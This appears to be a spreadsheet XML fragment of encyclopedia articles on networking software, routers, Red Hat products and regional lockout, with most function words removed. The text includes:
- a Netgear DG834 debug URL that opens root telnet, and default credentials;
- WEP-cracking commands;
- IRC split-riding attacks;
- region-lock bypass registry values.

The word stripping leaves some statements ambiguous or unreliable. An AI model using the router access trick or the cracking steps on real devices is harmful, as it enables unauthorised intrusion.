    <t>ntopng computer software monitoring traffic computer network. designed high-performance, low-resource replacement ntop. name derived ntop next generation. ntopng open-source software released general public license (gplv3) software. source code versions available operating systems: unix, linux, bsd, windows. binary versions available centos, ubuntu, demo binary available windows limits analysis 2,000 packets. ntopng's engine written programming language c++. optional interface written lua. ntopng relies redis key-value server rather traditional database, takes advantage ndpi protocol detection, supports geolocation hosts, able display real-time flow analysis connected hosts. sample explanation: ntopng executable, mode decode responses resolve numeric ips, fifth network interface, operate daemon mode, redis server running local host, operate verbose mode. also ntop references external links official website</t>
  </si>
  <si>
    <t>Ntop</t>
  </si>
  <si>
    <t>ntop computer software probes computer network show network similar program processes. software interactive mode, displays network status user's terminal. mode, acts server, creating html dump network status. supports netflow-sflow emitter-collector, hypertext transfer protocol (http) based client interface creating ntop-centric monitoring applications, rrdtool (rrd) persistently storing traffic statistics.ntop available unix win32-based platforms. developed luca deri, italian research scientist network manager university pisa. common usage linux system start ntop daemon (/etc/init.d/ntopd start), interface ntop visiting http://127.0.0.1:3000 provided loopback device started (/etc/init.d/net.lo start) listening port ntop 3000 (look option grep ntop). also netsniff-ng iftop ntopng references external links official website</t>
  </si>
  <si>
    <t>Red Hat Gluster Storage</t>
  </si>
  <si>
    <t>gluster storage, formerly storage server, computer storage product hat. based open source technologies glusterfs enterprise linux.the latest release, rhgs 3.5, combines enterprise linux (rhel also rhel latest glusterfs community release, ovirt, file system.in april 2014, re-branded glusterfs-based storage server "red gluster storage". description gluster storage, scale-out product, uses basis glusterfs, distributed file-system. gluster storage also exemplifies software-defined storage (sds). history june 2012, gluster storage announced commercially supported integration glusterfs enterprise linux. releases release notes references</t>
  </si>
  <si>
    <t>Netfilter</t>
  </si>
  <si>
    <t>netfilter framework provided linux kernel allows various networking-related operations implemented form customized handlers. netfilter offers various functions operations packet filtering, network address translation, port translation, provide functionality required directing packets network prohibiting packets reaching sensitive locations within network. netfilter represents hooks inside linux kernel, allowing specific kernel modules register callback functions kernel's networking stack. those functions, usually applied traffic form filtering modification rules, called every packet traverses respective hook within networking stack. history rusty russell started netfilter/iptables project 1998; also authored project's predecessor, ipchains. project grew, founded netfilter core team simply coreteam) 1999. software produced (called netfilter hereafter) uses general public license (gpl) license, march 2000 merged version 2.4.x linux kernel mainline. august 2003 harald welte became chairman coreteam. april 2004, following crack-down project distributing project's software embedded routers without complying gpl, german court granted welte historic injunction sitecom germany, refused follow gpl's terms (see gpl-related disputes). september 2007 patrick mchardy, development past years, elected chairman coreteam. prior iptables, predominant software packages creating linux firewalls ipchains linux kernel 2.2.x ipfwadm linux kernel 2.0.x, turn based bsd's ipfw. both ipchains ipfwadm alter networking code manipulate packets, linux kernel lacked general packets control framework introduction netfilter. whereas ipchains ipfwadm combine packet filtering (particularly three specific kinds nat, called masquerading, port forwarding, redirection), netfilter separates packet operations multiple parts, described below. each connects netfilter hooks different points access packets. connection tracking subsystems general powerful rudimentary versions within ipchains ipfwadm. 2017 ipv4 ipv6 flow offload infrastructure added, allowing speedup software flow table forwarding hardware offload support. userspace utility programs iptables(8) ip6tables(8) ebtables(8) arptables(8) ipset(8) nftables(8) iptables kernel modules named ip_tables, ip6_tables, arp_tables (the underscore part name), ebtables comprise legacy packet filtering portion netfilter hook system. they provide table-based system defining firewall rules filter transform packets. tables administered user-space tools iptables, ip6tables, arptables, ebtables. notice although kernel modules userspace utilities similar names, different entity different functionality. each table actually hook, table introduced serve specific purpose. netfilter concerned, runs particular table specific order respect tables. table call also execute rules, enables possibilities additional processing iteration. rules organized chains, words, "chains rules". these chains named predefined titles, including input, output forward. these chain titles help describe origin netfilter stack. packet reception, example, falls prerouting, input represents locally delivered data, forwarded traffic falls forward chain. locally generated output passes output chain, packets sent postrouting chain. netfilter modules organized tables (see below) capable checking origin select mode operation. iptable_raw module when loaded, registers hook called netfilter hook. provides table called used filter packets reach memory-demanding operations connection tracking. iptable_mangle module registers hook mangle table connection tracking (see below) (but still table), modifications made packet. this enables additional modifications rules follow, filtering. iptable_nat module registers hooks: destination network address translation-based transformations ("dnat") applied filter hook, source network address translation-based transformations ("snat") applied afterwards. network address translation table "nat") made available iptables merely "configuration database" mappings only, intended filtering kind. iptable_filter module registers filter table, used general-purpose filtering (firewalling). security_filter module used mandatory access control (mac) networking rules, enabled secmark connsecmark targets. (these so-called "targets" refer security-enhanced linux markers.) mandatory access control implemented linux security modules selinux. security table called following call filter table, allowing discretionary access control (dac) rules filter table take effect rules. this table provides following built-in chains: input (for packets coming computer itself), output (for altering locally-generated packets routing), forward (for altering packets routed computer). nftables nftables packet-filtering portion netfilter. userspace utility replaces iptables, ip6tables, arptables ebtables. nftables kernel engine adds simple virtual machine linux kernel, able execute bytecode inspect network packet make decisions packet handled. operations implemented virtual machine intentionally made basic: data packet itself, look associated metadata (inbound interface, example), manage connection tracking data. arithmetic, bitwise comparison operators used making decisions based data. virtual machine also capable manipulating sets data (typically addresses), allowing multiple comparison operations replaced single lookup.this contrast legacy xtables (iptables, etc.) code, protocol awareness deeply built code replicated four times‍—‌for ipv4, ipv6, arp, ethernet bridging‍—‌as firewall engines protocol-specific used generic manner. main advantages iptables simplification linux kernel abi, reduction code duplication, improved error reporting, efficient execution, storage, incremental, atomic changes filtering rules. packet defragmentation nf_defrag_ipv4 module defragment ipv4 packets reach netfilter's connection tracking (nf_conntrack_ipv4 module). this necessary in-kernel connection tracking helper modules (which form "mini-algs") work reliably entire packets, necessarily fragments. ipv6 defragmenter module right, integrated nf_conntrack_ipv6 module. connection tracking important features built netfilter framework connection tracking. connection tracking allows kernel keep track logical network connections sessions, thereby relate packets make connection. relies information translate related packets way, iptables information stateful firewall. connection state however completely independent upper-level state, tcp's sctp's state. part reason merely forwarding packets, i.e. local delivery, engine necessarily invoked all. even connectionless-mode transmissions udp, ipsec (ah/esp), tunneling protocols have, least, pseudo connection state. heuristic protocols often based upon preset timeout value inactivity, whose expiration netfilter connection dropped. each netfilter connection uniquely identified (layer-3 protocol, source address, destination address, layer-4 protocol, layer-4 key) tuple. layer-4 depends transport protocol; tcp/udp port numbers, tunnels tunnel otherwise zero, part tuple. able inspect port cases, packets mandatorily defragmented. netfilter connections manipulated user-space tool conntrack. iptables make checking connection's information states, statuses make packet filtering rules powerful easier manage. common states are: trying create connection established part already-existing connection related assigned packet initiating connection "expected"; aforementioned mini-algs expectations, example, nf_conntrack_ftp module sees "pasv" command invalid packet found invalid, e.g. would adhere state diagram untracked special state assigned administrator bypass connection tracking particular packet (see table, above).a normal example would first packet conntrack subsystem sees classified "new", reply would classified "established" icmp error would "related". icmp error packet match known connection would "invalid". connection tracking helpers through plugin modules, connection tracking given knowledge application-layer protocols thus understand distinct connections "related". example, consider protocol. control connection established, whenever data transferred, separate connection established transfer when nf_conntrack_ftp module loaded, first packet data connection classified "related" instead "new", logically part existing connection. helpers inspect packet time, vital information connection tracking split across packets, either fragmentation segmentation, helper necessarily recognize patterns therefore perform operation. fragmentation dealt connection tracking subsystem requiring defragmentation, though segmentation handled. case ftp, segmentation deemed happen "near" command like pasv standard segment sizes, dealt netfilter either. network address translation each connection original addresses reply addresses, initially start same. netfilter implemented simply changing reply address, desired, port. when packets received, connection tuple also compared reply address pair (and ports). being fragment-free also requirement nat. need ipv4 packets refragmented normal, non-netfilter, ipv4 stack.) helpers similar connection tracking helpers, helpers packet inspection substitute original addresses reply addresses payload. further netfilter projects though kernel modules make netfilter code directly, netfilter project hosts noteworthy software. conntrack-tools conntrack-tools user-space tools linux allow system administrators interact connection tracking entries tables. package includes conntrackd daemon command line interface conntrack. userspace daemon conntrackd used enable high availability cluster-based stateful firewalls collect statistics stateful firewall use. command line interface conntrack provides flexible interface connection tracking system obsolete /proc/net/nf_conntrack. ipset unlike extensions connection tracking, ipset related iptables core netfilter code. ipset make netfilter hooks instance, actually provides iptables module match minimal modifications (set/clear) sets. user-space tool called ipset used maintain inspect called sets" linux kernel. usually contains addresses, also contain sets network numbers, depending "type". these sets much lookup-efficient bare iptables rules, course come greater memory footprint. different storage algorithms (for data structures memory) provided ipset user select optimum solution. entry bound another set, allowing sophisticated matching operations. removed (destroyed) iptables rules sets referring proxy synproxy target makes handling large floods possible without large performance penalties imposed connection tracking cases. redirecting initial requests synproxy target, connections registered within connection tracking reach validated final state, freeing connection tracking accounting large numbers potentially invalid connections. this way, huge floods handled effective way.on november 2013, proxy functionality merged netfilter, release version 3.12 linux kernel mainline. ulogd ulogd user-space daemon receive packets event notifications netfilter subsystems. ip_tables deliver packets userspace queueing mechanism connection tracking interact ulogd exchange information packets events (such connection teardown, setup). userspace libraries netfilter also provides libraries libnetfilter prefix names, used perform different tasks userspace. these libraries released version specifically, following: libnetfilter_queue allows perform userspace packet queueing conjunction iptables; based libnfnetlink libnetfilter_conntrack allows manipulation connection tracking entries userspace; based libnfnetlink libnetfilter_log allows collection messages generated iptables; based libnfnetlink libnl-3-netfilter allows operations queues, connection tracking logs; part libnl project libiptc allows changes performed iptables firewall rulesets; based netlink library, internally used iptables utilities libipset allows operations sets; based libmnl. netfilter workshops netfilter project organizes annual meeting developers, used discuss ongoing research development efforts. 2018 netfilter workshop took place berlin, germany, june 2018. also references external links official website conntrack-tools homepage ipset homepage ulogd homepage home netfilter workshop websites "writing netfilter modules" (e-book; 2009) "netfilter iptables stateful firewalling linux" october 2001) network overview rami rosen</t>
  </si>
  <si>
    <t>Netgear WGR614L</t>
  </si>
  <si>
    <t>wgr614l (also known wgr614v8) 802.11b/g wireless network router created netgear. officially launched june 2008. wgr614l runs open source linux firmware supports installation third party packages dd-wrt, tomato, openwrt. hardware broadcom bcm5354 flash memory instruction cache data cache 1000 byte pre-fetch cache cache gain antennas internal external dipole) 802.11 wireless support certified windows vista features supports installation openwrt, tomato firmware, dd-wrt supports wi-fi protected setup (wps) automatically detects type, exposed host (dmz), address authentication, content filtering, logs email alerts internet activity static dynamic routing tcp/ip, pass-through (ipsec, l2tp), nat, pptp, pppoe, dhcp (client server) applications wgr614l designed used home business environments. often used connection third-party firmware solutions, sputniknet titan hotspots. router also used wireless client bridge (utilizing openwrt firmware) wireless repeater bridge (using dd-wrt firmware). external links press release announcing wgr614l official support page list wgr614l resources wgr614l dd-wrt.com using wgr614l wireless repeater bridge using dd-wrt using wgr614l wireless client bridge using openwrt firmwarefirmware downloadsdd-wrt router database (lookup wgr614l). dd-wrt, tomato openwrt links open router website.</t>
  </si>
  <si>
    <t>Netgear WNR3500L</t>
  </si>
  <si>
    <t>wnr3500l (also known wnr3500u) 802.11b/g/n wi-fi router created netgear. officially launched autumn 2009. wnr3500l runs open-source linux firmware supports installation third party packages dd-wrt tomato. hardware version broadcom bcm4718 flash memory instruction cache data cache three internal antennas 802.11 b/g/n wireless support 10/100/1000 mbit/s port four 10/100/1000 mbit/s switched ports integrated ehci host port compatible windows 7version broadcom bcm47186 flash memory instruction cache data cache internal antennas 802.11 b/g/n wireless support 10/100/1000 mbit/s port four 10/100/1000 mbit/s switched ports integrated ehci host port compatible windows features there several ways identify version, including label version 2.version supports installation tomato firmware dd-wrt; manufacturer custom version openwrt mainline version works partially supports wi-fi protected setup (wps) automatically detects type, exposed host (dmz), address authentication, content filtering, logs email alerts internet activity static dynamic routing tcp/ip, pass-through (ipsec, l2tp), nat, pptp, pppoe, dhcp (client server) supports ipv6, including automatic 6to4 tunnel (since firmware 1.2.2.30)version supports installation tomato firmware (shibby toastman varieties) dd-wrt open source features according analysis, installing dd-wrt reduced performance. references external links review installation netgear wnr3500l wireless-n gigabit open source router wnr3500l dd-wrt.com official product page official support page firmware downloads dd-wrt wnr3500l tomato wnr3500l netgear wnr3500l setup openwrt wnr3500l other firmware wnr3500l netgear firmware update</t>
  </si>
  <si>
    <t>Netpgp</t>
  </si>
  <si>
    <t>netpgp licensed project based openpgp provides signing, verification, encryption, decryption files. also comes netpgpkeys tool management. netpgp higher level wrapper improvement upon openpgp library written laurie rachel willmer. public openpgp hidden exposing simple interface encryption decryption well generating verifying digital signatures. netpgp included netbsd distribution 2009 midnightbsd june 2009. references external links netpgp bsd-licensed privacy software</t>
  </si>
  <si>
    <t>Remote Utilities</t>
  </si>
  <si>
    <t>remote utilities remote desktop software allows user remotely control another computer proprietary protocol remote computer's desktop, operate keyboard mouse.the program utilizes client-server model consists primary components: host installed remote computer viewer installed local other modules include agent, remote utilities server server) portable viewer. feature architecture remote utilities provides full control remote system allows view remote computer without disrupting user. connection established address internet filtering system allowing restrict access certain addresses.it following connection modes: full control view file transfer task manager terminal inventory manager integration text chat remote registry screen recorder execute power control send message voice video chat remote settings internet-id internet-id technology became available remote utilities starting version 5.0. allows user bypass software hardware firewalls devices setting remote connection internet. remote utilities agent remote utilities agent introduced release version works program module spontaneous support runs without installation administrative privileges. remote utilities server remote utilities server server) program module serves self-hosted replacement remote utilities hosted relay servers. server made available remote utilities version release. recent version server december 2021 version 3.1.0.0. history developer company remote utilities, formerly known usoris systems founded 2009. predecessor project, remote office manager started 2004 available free download 2004 early 2010. current name, remote utilities, given version mid-2010 part rebranding effort. after version 4.3, remote utilities released version 2011 major update. april 2012 minor update version included features, free license, updated licensing model. operating system support remote utilities initially developed microsoft windows. currently supports windows, macos (viewer only), linux (viewer only), (viewer only), android (viewer only).remote utilities also developed applications android devices allowing users control computers remotely phone. reception following remote utilities's launch, software received consecutive positive reviews world editors 2011 2012. featured techradar's best free remote desktop software 2019. references external links official website</t>
  </si>
  <si>
    <t>Netsniff-ng</t>
  </si>
  <si>
    <t>netsniff-ng free linux network analyzer networking toolkit originally written daniel borkmann. gain performance reached zero-copy mechanisms network packets (rx_ring, tx_ring), linux kernel need copy packets kernel space user space system calls recvmsg(). libpcap, starting release 1.0.0, also supports zero-copy mechanism linux capturing (rx_ring), programs using libpcap also mechanism linux. overview netsniff-ng initially created network sniffer support linux kernel packet-mmap interface network packets, later tools added make useful toolkit iproute2 suite, instance. through kernel's zero-copy interface, efficient packet processing reached even commodity hardware. instance, gigabit ethernet wire-speed reached netsniff-ng's trafgen. netsniff-ng toolkit depend libpcap library. moreover, special operating system patches needed toolkit. netsniff-ng free software released terms general public license version toolkit currently consists network analyzer, packet capturer replayer, wire-rate traffic generator, encrypted multiuser tunnel, berkeley packet filter compiler, networking statistic tools, autonomous system trace route more: netsniff-ng, zero-copy analyzer, packet capturer replayer, supporting pcap file format trafgen, zero-copy wire-rate traffic generator mausezahn, packet generator analyzer hw/sw appliances cisco-cli bpfc, berkeley packet filter compiler ifpps, top-like kernel networking statistics tool flowtop, top-like netfilter connection tracking tool geo-ip information curvetun, lightweight multiuser tunnel based elliptic-curve cryptography astraceroute, autonomous system trace route utility geo-ip informationdistribution specific packages available major operating system distributions debian fedora linux. also added xplico's network forensic toolkit, grml linux, securityonion, network security toolkit. netsniff-ng toolkit also used academia. basic commands working netsniff-ng examples, assumed eth0 used network interface. programs netsniff-ng suite accept long options, e.g., --in --out --dev geographical probe trace route website:astraceroute eth0 &lt;host e.g., netsniff-ng.org&gt; kernel networking statistics within promiscuous mode:ifpps eth0 high-speed network packet traffic generation, trafgen.txf packet configuration:trafgen eth0 trafgen.txf compiling berkeley packet filter fubar.bpf:bpfc fubar.bpf live-tracking current connections (including protocol, application name, city country source destination):flowtop efficiently dumping network traffic pcap file:netsniff-ng eth0 dump.pcap platforms netsniff-ng toolkit currently runs linux systems. developers decline port microsoft windows. also comparison packet analyzers openvpn packet generator tcpdump traceroute traffic generation model wireshark xplico references external links official netsniff-ng website netsniff-ng netsniff-ng github netsniff-ng mailing list archive linux' packet mmap(), bpf, netsniff-ng toolkit, talk devconf (long) packet sockets, bpf, netsniff-ng, talk opensourcedays (short) netsniff-ng(8) linux administration privileged commands manual</t>
  </si>
  <si>
    <t>Novell ZENworks Application VIrtualization</t>
  </si>
  <si>
    <t>novell zenworks application virtualization application virtualization portable application creation console novell allows user build applications like executable file. this product known micro focus desktop containers. history zenworks application virtualization first made available september 2008. since initial release, undergone additional major releases, including versions 6.x, current version 8.x. architecture technology zenworks application virtualization application virtualization solution allows users build highly portable virtual windows applications like common executable files. virtual applications self-contained include isolated sandbox interfaces operating system registry indirectly. virtualized applications without agent/server architecture without local client install. technology also supports application streaming, form on-demand application distribution. this type application streaming uses predictive algorithm maps common user behavior applications anticipate portions application code sent first, based upon changing user behavior, effort improve performance. building virtual applications process creating virtual application zenworks application virtualization follows three paths: auto-configured applications: wizards build pre-configured applications. included applications limited popular common applications. snap-shot: take "snapshots" example system's state target application installed. manual configuration: manually configure registry, sandbox, portions target application. this approach typically requires experienced programmer.users define application behavior, setting application expire certain date, make application portable storage device (usb drive). limitations windows applications: zenworks application virtualization limited windows operating system building running virtualized applications. does always compatibility: zenworks application virtualization address application compatibility problems cases, used primary means solving operating system compatibility. also application streaming portable application creators vmware thinapp microsoft application virtualization references external links novell zenworks application virtualization product page novell zenworks application virtualization application streaming demo site</t>
  </si>
  <si>
    <t>Netsplit</t>
  </si>
  <si>
    <t>computer networking, specifically internet relay chat (irc), netsplit disconnection servers. split servers splits entire network pieces. cause effects consider graph right, represents computer network. each line represents established connection. therefore, server connected directly also connected disruption connection occurs, connection terminated result. this occur either socket producing error, excessive server anticipates case (which called timeout). when connection severed, users connected servers longer reachable network appear quit. example, user sara connected server user connected server user connected splits, disconnects, appear sara quit (disconnected network), appear sara quit. however, still talk anyone connected server case server this happens servers connected informed change network status, update local information accordingly display change. later, server relink (reconnect) server servers) network users appeared quit rejoin; process sending updated information servers network called netburst sync). security issues occasionally, users attempt netsplits gain access private channels. denial-of-service attack used cause netsplit overloading server's network connection internet infrastructure servers. none channel users server user could join private channel later gain access servers relink. this commonly known split riding riding split. another typical netsplit-oriented attack nickname colliding. attack, user split segment network would change nicknames user side split network. upon reconnection, network would disconnect users nickname time. modern server software largely eliminated method, servers using older software still vulnerable. appearance below examples typical netsplit. when servers split, user sees large number users quitting. after servers reconnected, user sees users rejoining. clients command-line client user private network references hossein bidgoli: internet encyclopedia- volume wiley 2004, isbn 978-0-471-22204-0, 312-313 external links netsplit manual (retrieved 2009-12-2)</t>
  </si>
  <si>
    <t>Netgear DG834 (series)</t>
  </si>
  <si>
    <t>dg834 series popular adsl modem router products netgear. devices directly connected phone line establish adsl broadband internet connection share among several computers 802.3 ethernet many models) 802.11b/g wireless data links. these devices popular among isps provide solution (adsl modem/router/firewall/switch), ideal home broadband users. netgear website claims dg834g popular wireless router lists five awards received.the dg834g perhaps popular product series, produced five versions. versions wi-fi. dg834 (without suffix) product without wi-fi. wi-fi added later plugging wireless access point although occupies rj45 ports. dg834gt similar product looks like dg834g broadcom chipset like dg834g supports atheros super achieve mbit/s signaling rate (double standard 802.11g). united kingdom, many dg834gt routers supplied broadband branded logo. later supplied dg934g router, dg834g router black case. dg834gb similar dg834gt, broadcom chipset, support 54mbit/s wifi. modifications support annex-b adsl. dg834pn model wi-fi external antenna. internal antennas, easily recognised blue dome case. dg834gsp model locked particular isp. firmware netgear's stock firmware products series runs linux. this popularity among computer enthusiasts provides cheaper alternative linux router. much netgear firmware built open-source software, netgear provide source code build system enable users reassemble firmware image. result, various individuals projects produced modified firmware extend capabilities built-in firmware. also possible completely replace built-in firmware ti-ar7 broadcom chipsets firmware projects, openwrt. products except dg834(g) mips architecture cpu, dg834(g) runs architecture cpu. security issue person access router using browser, enable "debug" mode using [ip_addr]/setup.cgi?todo=debug connect telnet directly router's embedded linux system 'root', gives unfettered access router's operating system busybox functionality. additionally, 'hidden' [ip_addr]/setup.cgi?todo=ping_test also allows unfettered access model username password requested). there user option provided disable this. default netgear firmware telnet access lacks password control; modified versions (such sky) telnet password exists based address found online websites. default settings address: 192.168.0.1 (alternate login http://www.routerlogin.net/) username: admin (virgin-branded units default user virgin) password: password (sky-branded units default password sky) function router modem specifications 4-port 10/100 mbit/s ethernet switch wireless access point (802.11b+g) (not dg834 models) adsl/adsl2/adsl2+ modem firewall dg834g restricted rules) router differences revisions/versions dg834(g) dg834(g) first release, known retrospect. grey case, larger subsequent models. power supply. ti-ar7 chipset (mips32 cpu), sdram, flash memory. versions black removable antenna rear left, using rp-sma connector. dg834(g) smaller design white case. different power supply requirements otherwise almost identical electrically (uses firmware v1). versions white removable antenna. dg834(g) rohs-compliant construction. expands wireless encryption options include: wpa2-psk(wi-fi protected access pre-shared key) wpa-psk+wpa2-psk wpa2-802.1x wpa-802.1x+wpa2-802.1x adds "advanced wireless settings" page enable, various wireless bridge repeater modes. removes parental control trend micro security services functionality. pppoe relay mode. improves sync speeds, good short lines. white removable antenna. dg834(g) fixed antenna versions. uses broadcom bcm6348 v0.7 chipset, also ethernet switch broadcom bcm5325 (previously, marvell) wifi module branded broadcom (previously texas instruments). frontal connection split "carrier wave" connection, another link. ethernet leds left front panel previous models right. dg834(g) (aka dg834gna north america): versions fixed antenna right (when viewed front) previous models antenna left. antenna attached board u-fl connector upgrade would possible somebody willing void warranty. comes additional buttons power, push connect using wi-fi protected setup, switching wireless radio off. reset achieved holding side buttons simultaneously seconds power light flashes. chipset used conexant cx94610 (all previous models used mips cpu). quality service also added fully changeable feature available firmware version 6.00.25 newer firmware version 1.6.01.34 quality service wireless distribution system available. dg834gt only version produced. white case white removable antenna rear left unit utilises rp-sma connector. inclusion broadcom bcm6348 chipset make model notable, particularly broadcom chipset offers superior compatibility texas instruments chipset (used dg834g v1-3) adsl2+ lines partly power spectrum density (psd) masks applied dslam. references external links netgear dg834gv5 product information netgear dg834gv5 support</t>
  </si>
  <si>
    <t>Red Hat Virtualization</t>
  </si>
  <si>
    <t>virtualization (rhv) virtualization product produced hat, based hypervisor. virtualization uses spice protocol vdsm (virtual desktop server manager) rhel-based centralized management server. acquire user group information active directory freeipa domain. some technologies virtualization came hat's acquisition qumranet. other parts derive ovirt. before 2016, version 3.x, product named enterprise virtualization (rhev). supports scheduling policies define logic virtual machines distributed among hosts.rhv supports hosts single cluster limit maximum number virtual machines. also supports plugging virtual cpus allows unlimited guest machines contrast rhel limited guest machines.rhv solution based primary software components: virtualization manager (rhv-m) virtualization hypervisors host (rhv-h) versions released june 2010, summit boston. announced january 2012, expanded partnerships alongside features management features, performance scalability linux windows workloads, power user portal self-service provisioning, restful api, local storage. released december 2012. released june 2013. released january 2014. released june 2014. among improvements, provides better integration openstack version enterprise linux. released february 2015. released march 2016. released august 2016. rebranding virtualization. released april 2017. support qcow3 image format. unplug cpus (limited cpus previously plugged). sr-iov live-migrated. ability sparcify thinly provisioned disks shut down. possible pass discard commands underlying storage (previously qemu ignoring them). vcpu host images also include tcpdump, screen. released 2018. brings ease-of-use, automation, continued tighter integration portfolio. released 2019 includes guest time synchronization, among enhancements. released 2020 includes improved integration openshift, among enhancements. also distribution openstack references external links official website</t>
  </si>
  <si>
    <t>Network encryption cracking</t>
  </si>
  <si>
    <t>network encryption cracking breaching network encryptions (e.g., wep, wpa, ...), usually special encryption cracking software. done range attacks (active passive) including injecting traffic, decrypting traffic, dictionary-based attacks. methods mentioned above, several types attacks possible. more precisely are: decrypting traffic based tricking access points (active attack) injecting traffic based known plaintext (active attack) gathering traffic performing brute force/dictionary based attacks decrypting traffic using statistical analysis (passive attack) injecting traffic injecting traffic means inserting forged encrypted messages network. done either known generate messages), known encrypted message plaintext message gathered, comparison two. programs able latter aireplay wepwedgie. decrypting decryption often requires tools; gathering packets another analysing packet determining key. gathering packets done tools wireshark prismdump cracking done tools wepcrack, airsnort, aircrack, weplab. when gathering packets, often great amount required perform cracking. depending attack used, 5-16 million frames required. attack command itself, however, surprisingly simple. wepcrack commands inputted wepcrack are: perl \progra~1\wepcrack\pcap-getiv.pl this command generates log-file (ivfile.log) captured packet obtained wireshark prismdump packet least million frames required. perl \progra~1\wepcrack\wepcrack\.pl ivfile.log this command asks wepcrack determine file. aircrack aircrack another program that's even simpler use, command need entered; instead user asked type parameters click buttons. first airodump started gather packets; herefore channel mac-filter asked, user need know (instead inputted respectively). then, aircrack started, file created airodump accessed, needs entered program determines key. airsnort airsnort even simpler program, completely interface-based. attack simple brute-force attack however, cracking encryption take (from several days weeks). especially traffic (only users network, cracking take least weeks). comparison tools comparison tools noted found security focus. references</t>
  </si>
  <si>
    <t>Red Hat cluster suite</t>
  </si>
  <si>
    <t>cluster includes software create high availability load balancing cluster. both used system although case unlikely. both products, high availability add-on load balancer add-on, based open-source community projects. cluster developers contribute code upstream community. computational clustering part cluster suite, instead provided mrg. high-availability add-on high availability add-on hat's implementation linux-ha. attempts ensure service availability monitoring nodes cluster. nodes cluster must agree configuration shared services state cluster considered quorum services able started. primary form communicating node status network device (commonly ethernet), although case possible network failure, quorum decided secondary methods shared storage multicast. software services, filesystems network status monitored controlled cluster suite, services resources failed network nodes case failure. cluster forcibly terminates cluster node's access services resources, fencing, ensure node data known state. node terminated removing power (known stonith) access shared storage. more recent versions distributed lock manager, allow fine grained locking single point failure. earlier versions cluster suite relied "grand unified lock manager" (gulm) could clustered, still presented point failure nodes acting gulm servers fail. gulm last available cluster suite technical details support nodes nodes enterprise linux (unix) /smb /gfs /gfs2 (multiple operating systems) file system failover support service failover support fully shared storage subsystem comprehensive data integrity scsi fibre channel support resource agents load balancing add-on adapted piranha load balancing software allow transparent load balancing failover servers. application balanced require special configuration balanced, instead enterprise linux server load balancer configured, intercepts routes traffic based metrics/rules load balancer. support product life-cycle cluster suite support tied matching version enterprise linux follows maintenance policy. product activation, time limit remote kill switch, remain working support life cycle ended. partially supported running vmware virtual machine. history cluster suite available enterprise linux march 2002 (2002-03-26) enterprise linux 3.x, 4.x, supported global file system (v1.x) filesystem enterprise linux enterprise linux later global file system enterprise linux later, corosync (project), cman, rgmanager enterprise linux later, corosync (project), cman, rgmanager, pacemaker resource manager enterprise linux later october 2014 (2014-10-06), corosync (project) pacemaker resource manager also global file system logical volume manager (linux) references external links cluster suite configuring managing cluster best presuming/requiring enterprise</t>
  </si>
  <si>
    <t>Regional lockout</t>
  </si>
  <si>
    <t>regional lockout region coding) class digital rights management preventing certain product service, multimedia hardware device, outside certain region territory. regional lockout enforced physical means, technological means detecting user's address using identifying code, unintentional means introduced devices supporting certain regional technologies (such video formats, i.e., ntsc pal). regional lockout enforced several reasons, stagger release certain product, avoid losing sales product's foreign publisher, maximize product's impact certain region localization, hinder grey market imports enforcing price discrimination, prevent users accessing certain content territory legal reasons (either censorship laws, distributor rights certain intellectual property outside specified region). multimedia disc regions dvd, blu-ray disc, media formats support region coding; dvds eight region codes (region reserved future use; region used "international venues", airplanes cruise ships), blu-ray discs three region codes corresponding different areas world. most blu-rays, however, region-free. computers, region usually changed five times. windows uses three region counters: one, drive, player software (occasionally, player software region counter own, uses windows). after fifth region change, system locked region. modern drives (type rpc-2), region lock saved hardware, even reinstalling windows using drive different computer unlock drive again. unlike regions, blu-ray regions verified player software, computer system drive. region code stored file registry, hacks reset region counter player software. stand-alone players, region code part firmware. bypassing region codes, software multi-regional players available. form blu-ray region coding tests region player/player software, also country code, repurposing user setting intended localization (psr19) form regional lockout. this means, example, japan region american discs play devices/software configured japan vice versa, since countries different country codes. (for example, united states "us" (21843 0x5553), japan "jp" (19024 0x4a50), canada "ca" (17217 0x4341).) although three blu-ray regions, country code allows much precise control regional distribution blu-ray discs eight) regions. since blu-ray discs cheaper america japan, american releases japanese anime series often protected prevent reversal importations. some discs check whether country code canada (sometimes also mexico) play countries, others allow country codes (even non-region-a countries) except japanese. anydvd (7.5.9.0 higher) option enforce country code. software developers users also change country code enforce registry value "bdcountrycode" country code" using value 4294967295 0xffffffff. (before change value, anydvd must closed, changing, must restarted.) some stand-alone blu-ray players player programs allow change country code (e.g. parental lock) bypass protection like that. software some features certain programs are/were disabled software is/was installed computer certain region. older versions copy software clonecd, features "amplify weak sectors", "protected games," "hide media" disabled united states japan. changing region language settings windows (e.g., canadian english) patches could unlock features countries. slysoft decided leave options disabled legal reasons, but, strangely enough, program "anydvd", also illegal according law, features disabled. current version clonecd (5.3.1.4) region-restricted anymore. newer versions copy software dvdfab (9.1.5.0 higher) come version blu-ray-ripping feature), downloaded homepage dvdfab.cn identifies address, non-us version (with working blu-ray-ripping feature). some webpages allow download non-us version also (they store non-us version directly download links developer's homepage). software ccleaner v5.45.6611 added check prevent embargoed countries. some programs (e.g., games) distributed different versions ntsc computers. cases, avoid grey market imports international software piracy, designed computer wrong system. other programs computers systems. kaspersky sells anti-virus products different prices different regions uses regionalized activation codes. program bought country region activated another country region. once activated, software also used download updates regions long license valid. problems arise license must renewed, software must reinstalled, region bought. region identified address (there activation possible without internet connection), proxy recommended circumvent restriction. kaspersky regions are: region canada, united states, mexico, bermuda region western europe, middle east, south africa, egypt, japan region southeast asia region central america, south america (excluding french guiana), oceania; mexico uses software uses flags regions region africa, india, commonwealth independent states (also includes czech republic, greece, hungary, poland, romania, serbia) region mainland china region elsewhere region special international area (airplane, steamer, etc.)the desktop versions pavilion compaq presario region-locked, according build 91ukv6pra1, a6740uk released 2009. wildtangent emea, magic desktop work models flexbuild regions are: usa: united states jap: japan kor: korean emea: middle east touch: designed touchsmart websites internet, geo-blocking used primarily control access online media content licensed playback certain region territorial licensing arrangements. video games regional lockouts video games achieved several methods, hardware/software authentication, slot pin-out change, differences cartridge cases, blocking online software patching. most console video games region encoding. main regions are: japan asia (ntsc-j) north america south america (ntsc-u) europe, zealand, australia, middle east, india, south africa (pal region) china (ntsc-c) atari inc. atari 2600 regional locking, ntsc games display wrong colors, slow speed sound systems vice versa. atari 7800 regional locking ntsc systems, leaving pal-made games unplayable them. however, versions atari 7800 ntsc games, suffering problems atari 2600 did. atari 5200, lynx jaguar region-free. nintendo nintendo first console maker introduce regional locks consoles, used every consoles except nintendo switch, mostly abstaining using handheld products. games nintendo entertainment system (nes) locked physical technical means; design cartridges differed japan markets, using different number pins. famicom (the japanese model) used slightly smaller cartridges, japanese games could consoles without adapter 